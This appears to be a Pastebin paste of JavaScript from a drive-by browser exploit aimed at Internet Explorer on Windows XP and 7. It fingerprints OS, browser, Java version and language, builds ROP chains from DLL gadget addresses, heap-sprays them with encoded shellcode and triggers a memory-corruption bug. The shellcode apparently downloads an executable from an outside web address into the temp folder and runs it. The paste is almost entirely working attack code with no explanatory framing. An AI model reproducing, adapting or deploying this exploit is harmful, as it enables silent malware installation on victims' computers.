Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function int_to_hex(dword)
- {
- var d=Number(dword).toString (16);
- while(d.length<8) d='0'+d;
- return unescape('%u'+d.substr(4,8)+'%u'+d.substr(0,4));
- };
- function build_block(s)
- {
- var endtag = unescape("AA");
- var len = 0x10000 - (s.length *2 + endtag.length * 2);
- var b = "11";
- while(b.length < len) b += b;
- var block = b.substring(0, len / 2);
- block = s + block + endtag;
- var bigblock = "";
- for (var i=0; i < 8; i++) bigblock += block;
- bigblock = bigblock.substring(0, (0x80000-0x28)/2);
- return bigblock
- }
- function is_java_16()
- {
- var java_ver = deployJava.getJREs();
- var java7 = java_ver.toString().indexOf('1.7');
- var java6 = java_ver.toString().indexOf('1.6');
- if (java7 == -1 && java6 != -1) return true; else return false;
- }
- function is_win7()
- {
- return navigator.userAgent.toLowerCase().indexOf("windows nt 6.1") > 0;
- }
- function is_xp()
- {
- return navigator.userAgent.toLowerCase().indexOf("windows nt 5.1") > 0;
- }
- function is_ie9()
- {
- return navigator.userAgent.toLowerCase().indexOf("msie 9") > 0;
- }
- function language()
- {
- // zh-cn, en-us
- return navigator.browserLanguage;
- }
- function build_rop_stack(spraybase)
- {
- var heapspray = "";
- if (is_xp())
- {
- var msvcrt_base = 0x77C10000; // en-us
- switch (language())
- {
- case "en-us":
- msvcrt_base = 0x77C10000; break;
- case "zh-cn":
- case "zh-tw":
- msvcrt_base = 0x77BE0000; break;
- case "ko":
- case "ja":
- msvcrt_base = 0x77BC0000; break;
- default: break;
- }
- heapspray = ""
- + int_to_hex(msvcrt_base+0x000116ec) // 0 <-- vtbl
- + int_to_hex(0x44444444) // 4
- + int_to_hex(msvcrt_base+0x00005ed5) // 8 -- second call (call [ecx+8])
- + int_to_hex(msvcrt_base+0x00005ed6) // c
- + int_to_hex(msvcrt_base+0x00005ed6) // 10
- + int_to_hex(msvcrt_base+0x00005ed6) // 14
- + int_to_hex(msvcrt_base+0x00005ed6) // 18 -- first call (call [ecx+18])
- + int_to_hex(msvcrt_base+0x000144c6) // 1c
- + int_to_hex(msvcrt_base+0x00001104) // 20
- + int_to_hex(msvcrt_base+0x000144c3) // 24
- + int_to_hex(spraybase) // 28
- + int_to_hex(msvcrt_base+0x00012a18) // 2c
- + int_to_hex(spraybase+0x90) // 30 -- 90 is sizeof heapspray
- + int_to_hex(spraybase) // 34
- + int_to_hex(0x00005500) // 38
- + int_to_hex(0x00001000) // 3c
- + int_to_hex(0x00000040) // 40
- + int_to_hex(spraybase+0x34) // 44
- + int_to_hex(spraybase) // 48
- + int_to_hex(spraybase) // 4c
- + int_to_hex(spraybase) // 50
- + int_to_hex(spraybase) // 54
- + int_to_hex(spraybase) // 58
- + int_to_hex(spraybase) // 5c
- + int_to_hex(spraybase) // 60
- + int_to_hex(spraybase) // 64
- + int_to_hex(spraybase) // 68
- + int_to_hex(spraybase) // 6c
- + int_to_hex(spraybase) // 70 <-- obj
- + int_to_hex(spraybase) // 74
- + int_to_hex(spraybase) // 78
- + int_to_hex(spraybase) // 7c
- + int_to_hex(spraybase) // 80
- + int_to_hex(spraybase) // 84
- + int_to_hex(spraybase) // 88
- + int_to_hex(spraybase) // 8c
- ;
- }
- else if(is_win7() && is_java_16())
- {
- heapspray = ""
- + int_to_hex(0x7C3425B5) // 0 <-- vtbl
- + int_to_hex(0x44444444) // 4
- + int_to_hex(0x7c348b05) // 8 -- second call (call [ecx+8])
- + int_to_hex(0x7C3425B7) // c
- + int_to_hex(0x7C3425B7) // 10
- + int_to_hex(0x7C3425B7) // 14
- + int_to_hex(0x7C3425B7) // 18 -- first call (call [ecx+18])
- + int_to_hex(0x7C3425B7) // 1c
- + int_to_hex(0x7c34c611) // 20
- + int_to_hex(0x7c37a030) // 24
- + int_to_hex(0x7c34c60e) // 28
- + int_to_hex(spraybase) // 2c
- + int_to_hex(0x7c34888f) // 30 -- 90 is sizeof heapspray
- + int_to_hex(spraybase+0x90) // 34
- + int_to_hex(spraybase) // 38
- + int_to_hex(0x00005500) // 3c
- + int_to_hex(0x00001000) // 40
- + int_to_hex(0x00000040) // 44
- + int_to_hex(spraybase) // 48
- + int_to_hex(spraybase) // 4c
- + int_to_hex(spraybase) // 50
- + int_to_hex(spraybase) // 54
- + int_to_hex(spraybase) // 58
- + int_to_hex(spraybase) // 5c
- + int_to_hex(spraybase) // 60
- + int_to_hex(spraybase) // 64
- + int_to_hex(spraybase) // 68
- + int_to_hex(spraybase) // 6c
- + int_to_hex(spraybase) // 70 <-- obj
- + int_to_hex(spraybase) // 74
- + int_to_hex(spraybase) // 78
- + int_to_hex(spraybase) // 7c
- + int_to_hex(spraybase) // 80
- + int_to_hex(spraybase) // 84
- + int_to_hex(spraybase) // 88
- + int_to_hex(spraybase) // 8c
- ;
- }
- else
- {
- throw "not supported!";
- }
- return heapspray;
- }
- spraybase = 0x11110024;
- if (is_ie9()) spraybase = 0x11110010;
- var shellcode = unescape("%u9090%u9090%u11E8%u0001%uC300%u00E8%u0000%u5800%uC083%u2D04%uFE86%uFFFF%u55C3%uEC8B%u5352%u558B%u3308%uF7C0%u32D0%uB302%uD108%u73E8%u3505%u8320%uEDB8%uCBFE%uF375%u3A80%u7400%u4203%uE7EB%uD0F7%u5A5B%uC2C9%u0004%u5651%u3357%u64C9%u358B%u0030%u0000%u768B%u8B0C%u1C76%u468B%u8B08%u207E%u368B%u4F38%u7518%u5FF3%u595E%u55C3%uEC8B%u5657%u5153%u7D8B%u8B08%u3C5F%u5C8B%u783B%uDF03%u4B8B%u0320%u084D%u3356%u42D2%u348B%u0391%u0875%uE856%uFF87%uFFFF%u453B%u750C%u5EEE%u4B8B%u0324%u084D%uB70F%u5114%u4B8B%u031C%u084D%u458B%u0308%u9104%u5B59%u5F5E%uC2C9%u0008%u8B55%u83EC%uFCC4%u758B%u8B08%u33FE%u33C0%u49C9%uF2FC%uE8AE%uFF78%uFFFF%uAD68%u34D1%u5041%u90E8%uFFFF%u56FF%uD0FF%u4589%u83FC%uFC7D%u7400%uEB19%uFF0F%uFF37%uFC75%u78E8%uFFFF%u89FF%u8307%u04C7%u3F81%u6161%u6161%uE975%uC78B%uC083%uC904%u04C2%uE800%uFEFE%uFFFF%u06EB%uE850%uFFA2%uFFFF%u3880%u7500%uC3F5%u8B55%u81EC%uF8C4%uFFFB%uE8FF%uFEE2%uFFFF%uD88B%uD8E8%uFFFF%u8DFF%u297B%uBD89%uFBFC%uFFFF%uC033%uC933%uFC49%uAEF2%uBD89%uFBF8%uFFFF%u538B%u6809%u0400%u0000%u858D%uFC00%uFFFF%uFF50%uFCB5%uFFFB%uFFFF%u8BD2%u2053%u006A%u006A%u858D%uFC00%uFFFF%uFF50%uF8B5%uFFFB%u6AFF%uFF00%u8BD2%u0D53%u006A%u858D%uFC00%uFFFF%uFF50%u8BD2%u1153%u6A50%uFFFF%uC9D2%u4BC3%u7265%u656E%u336C%u0032%u8A5A%u2B1D%u2C4F%u2845%u50AF%u41A0%u6161%u6161%u7255%u6D6C%u6E6F%u1900%uC3D4%u6192%u6161%u0061%u5425%u4D45%u2550%u635C%u2E61%u7865%u0065%u7468%u7074%u2F3A%u612F%u7072%u6765%u6967%u386F%u632E%u6D6F%u632F%u756F%u746E%u392F%u3731%u652E%u6578%u0000");
- var heapspray = build_rop_stack(spraybase);
- heapspray += shellcode;
- bigblock = build_block(heapspray);
- var blocks = new Array();
- for(var i = 0; i < 2 * 300; i++)
- blocks[i] = [bigblock].join("");
- /////////////////////////////////////////////////////////////////////////
- function SubtleArr() {
- document.execCommand("selectAll");
- };
- function TestArray() {
- document.write("imgx");
- parent.imgx.src = "AAAA" + int_to_hex(spraybase+0x70) + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement